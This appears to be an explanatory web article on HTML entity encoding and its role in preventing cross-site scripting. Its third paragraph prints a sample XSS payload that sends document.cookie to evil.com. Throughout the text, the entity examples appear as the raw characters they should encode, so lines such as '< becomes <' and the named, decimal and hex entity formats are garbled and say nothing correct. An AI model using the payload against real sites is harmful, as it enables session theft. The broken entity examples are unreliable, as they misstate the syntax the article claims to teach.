What Is HTML Entity Encoding?
HTML entity encoding replaces characters that have special meaning in HTML with safe escape sequences called entities. The five most critical characters are: < becomes <, > becomes >, & becomes &, " becomes ", and ' becomes ' or '. Without encoding, a browser interprets these characters as markup instructions rather than displayable text. If your page tries to show the literal string <script> without encoding, the browser sees an opening script tag and tries to execute whatever follows. Entity encoding tells the browser to display the characters as-is instead of parsing them as HTML structure.
There are three forms of HTML entities. Named entities use a human-readable label — & for ampersand, < for less-than, © for the copyright symbol. The HTML5 spec defines 2,231 named entities covering mathematical symbols, currency signs, arrows, Greek letters, and much more. Decimal numeric entities use the format < where 60 is the Unicode code point in base 10. Hexadecimal numeric entities use < where 3C is the same code point in base 16. All three forms are valid in HTML5. Named entities are easier to read in source code; numeric entities work for any Unicode character, including obscure ones without named equivalents.
Entity encoding is one of the foundational defenses against Cross-Site Scripting — XSS. XSS attacks inject malicious HTML or JavaScript into a page by exploiting places where user-supplied data is inserted into the DOM without proper encoding. A search page that reflects the query string directly into the HTML — like <p>Results for: USER_INPUT</p> — is vulnerable if an attacker crafts a query containing <script>document.location='https://evil.com/steal?c='+document.cookie</script>. Encoding that input turns every < and > into harmless entities, so the browser renders the text instead of executing the script. The OWASP Foundation ranks injection attacks as the number one web application security risk, and output encoding is the primary mitigation.